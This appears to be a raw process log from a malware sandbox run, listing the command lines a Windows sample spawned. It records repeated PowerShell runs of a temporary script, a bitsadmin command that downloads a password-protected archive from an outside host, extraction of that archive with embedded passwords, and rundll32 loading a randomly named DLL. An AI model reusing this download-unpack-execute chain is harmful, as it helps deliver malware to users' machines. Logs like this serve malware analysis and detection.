powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1976powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2300powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1788powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2740powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2680powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2092powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2488bitsadmin.exe "bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z
872data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZerFyxswOU1kSPo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
732data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pi9YcQvhaRhVM6Jx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
2608powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2892powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2420powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
3068powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
3064powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1332rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
772rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
1868powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1896powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1888powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2708powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1308explorer.exe C:\Windows\Explorer.EXE
1848